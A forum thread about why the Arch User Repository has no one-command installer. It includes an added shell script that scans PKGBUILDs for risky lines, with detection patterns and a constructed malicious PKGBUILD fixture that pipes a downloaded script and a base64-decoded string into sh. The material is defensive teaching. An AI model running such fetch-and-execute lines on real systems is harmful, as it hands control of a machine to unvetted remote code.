this post was submitted on 08 Jan 2026
7 points (88.9% liked)

Arch Linux

Arch noob here: Is there a single command to install from the AUR? And if the answer is no, why not?

[–] kumi@feddit.online 5 points 4 days ago* (last edited 4 days ago) (1 children)

Read https://wiki.archlinux.org/title/Arch_User_Repository

"Installing from the AUR" usually means:

  • Cloning the AUR repo
  • Installing build dependencies
    • If any of those are AUR packages, recursively repeat
  • Downloading source files from arbitrary online locations
  • Running arbitrary commands to build
  • Packing it all into a tarball
  • Running pacman -U on the tarball

Anyone can easily register and upload AUR packages in seconds or minutes.

This makes it a high-risk vector for malware and there is indeed malware uploaded to the AUR all the time. Looking at the NPM malware development, the increased popularity of Linux, and the already ongoing cyberattacks on AUR itself, this will only get worse.

The idea is that you are expected to manually inspect and vet the PKGBUILD yourself by doing these steps before you run makepkg itself. With great power comes great responsibility. Developers realize that it is not responsible to make a tool specifically designed to make dangerous behavior, explicitly bypassing safeguards, stopgaps and best-practice protocols, more convenient than the alternative, when it will be targeted at uneducated users.

As wltr mentioned, there are helpers, but you really should pick one that involves that manual inspection (like aurutils), and then only after becoming comfortable enough with git+makepkg+pacman to make it routine.

TLDR: If you can't or won't vet PKGBUILDs of AUR packages you shouldn't be blindly installing them.
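
The "inspect and vet the PKGBUILD before makepkg" step from the list above, as an added example that is not code from this thread or from any Arch or AUR project: a small POSIX sh helper that reads a PKGBUILD as text and flags the things a reviewer looks for (plain-http sources, SKIP checksums, curl-pipe-to-shell, sudo, writes to $HOME or system paths outside $pkgdir, base64/eval). It assumes only sh, grep, awk and sed; the check names, patterns, the example.invalid URLs and the two PKGBUILDs it runs on are all constructed for the example, not real packages.

```shell
#!/bin/sh
# Added example, not from the thread and not an Arch/AUR tool: a small
# pre-makepkg vetting helper. It never builds or installs anything; it
# reads a PKGBUILD as plain text and lists what a reviewer should look at
# before running makepkg. The check names and patterns are my own.

# Print every line of $3 matching the ERE $2, tagged with label $1.
# Exit status 0 when at least one line matched, 1 otherwise.
flag() {
    local label="$1" pattern="$2" file="$3" hits
    hits=$(grep -nE -- "$pattern" "$file") || return 1
    printf '%s\n' "$hits" | sed "s|^|  [$label] line |"
}

# Show the source=() array so you see where every file comes from.
list_sources() {
    awk '/^source(_[A-Za-z0-9_]+)?=\(/,/\)/' "$1"
}

# Heuristic review of one PKGBUILD. Prints findings; exit status is the
# number of risk categories hit (0 = nothing flagged). These are text
# heuristics: they can miss things and can flag benign lines. The point
# is to get you to read the file, not to replace reading it.
audit_pkgbuild() {
    local file="$1" n=0
    printf '== %s ==\n' "$file"
    # Sources fetched without transport security.
    flag insecure-source '(^|[^a-z])(http|git|ftp)://' "$file" && n=$((n+1))
    # SKIP disables integrity checks (expected for VCS sources, not tarballs).
    flag unverified-checksum "(sums=[(]|^[[:space:]]*)['\"]SKIP['\"]" "$file" && n=$((n+1))
    # Fetch-and-execute: whatever the server sends runs on your machine.
    flag pipe-to-shell '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)' "$file" && n=$((n+1))
    # makepkg never needs root; sudo inside a PKGBUILD is a red flag.
    flag sudo '(^|[^[:alnum:]_])sudo[[:space:]]' "$file" && n=$((n+1))
    # A package writes only under $pkgdir; touching $HOME is wrong.
    flag home-dir '[$][{]?HOME|~/' "$file" && n=$((n+1))
    # Mutating commands on absolute system paths not rooted in $pkgdir.
    flag system-path '(^|[[:space:]])(rm|cp|mv|install|chmod|chown|ln|tee|mkdir|touch)[[:space:]][^#]*[[:space:]]"?/(etc|usr|opt|var|bin|home|root)/' "$file" && n=$((n+1))
    # Encoded or dynamically evaluated code hides what actually runs.
    flag obfuscation 'base64[[:space:]]+(-d|--decode)|(^|[^[:alnum:]_])eval[[:space:]]|xxd[[:space:]]+-r' "$file" && n=$((n+1))
    printf '%s: %d risk categories flagged\n' "$file" "$n"
    return "$n"
}

# Two constructed PKGBUILDs (not real AUR packages) to run the audit on.
WORKDIR=$(mktemp -d)
CLEAN_PKGBUILD="$WORKDIR/PKGBUILD.clean"
BAD_PKGBUILD="$WORKDIR/PKGBUILD.shady"
cat > "$CLEAN_PKGBUILD" <<'EOF'
pkgname=hello-example
pkgver=1.2.3
pkgrel=1
source=("$pkgname-$pkgver.tar.gz::https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
    cd "$pkgname-$pkgver"
    ./configure --prefix=/usr
    make
}
package() {
    cd "$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
    install -Dm644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
}
EOF
cat > "$BAD_PKGBUILD" <<'EOF'
pkgname=shady-example
pkgver=0.1
pkgrel=1
source=("$pkgname-$pkgver.tar.gz::http://example.invalid/release.tar.gz"
        "helper.sh::https://example.invalid/helper.sh")
sha256sums=('SKIP'
            'SKIP')
build() {
    curl -fsSL https://example.invalid/setup.sh | sh
    echo "ZWNobyBoaQo=" | base64 -d | sh
}
package() {
    install -Dm755 "$srcdir/helper.sh" "$pkgdir/usr/bin/helper"
    mkdir -p "$HOME/.config/autostart"
    cp "$srcdir/helper.sh" /etc/profile.d/helper.sh
    sudo systemctl daemon-reload
}
EOF

# Intended flow (not executed here): git clone https://aur.archlinux.org/<pkg>.git,
# then audit_pkgbuild PKGBUILD, read the whole file, and only then makepkg -si.
list_sources "$BAD_PKGBUILD"
audit_pkgbuild "$CLEAN_PKGBUILD" || :
audit_pkgbuild "$BAD_PKGBUILD" || :
```

The clean PKGBUILD comes back with zero findings; the shady one trips all seven categories. A zero from this script is not a clean bill of health, it only means none of these crude patterns matched, so the real step is still reading the PKGBUILD (and any .install or patch files in the clone) yourself; the script just makes sure the obvious lines jump out first.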

[–] FreeBeard@slrpnk.net 1 points 4 days ago (1 children)

So it's a safety measure for people like me? That implies that I am capable of recognising malicious software. It seems like I've got even more reading to do.

Thank you for the explanation.

[–] kumi@feddit.online 2 points 4 days ago* (last edited 4 days ago)

In one way I think so, yes.

Many people obviously offload trust to the community to some extent (probably much more than we should, as reflected in the popularity of helpers like the one you asked for), which involves the AUR discussions and votes, and the Arch wiki.

Sometimes a flatpak or container image, or straight up compiling from instructions, is the easier answer.

Have fun and be careful but curious out there! How obscure an AUR package you will be able to deal with safely depends on your level of ambition.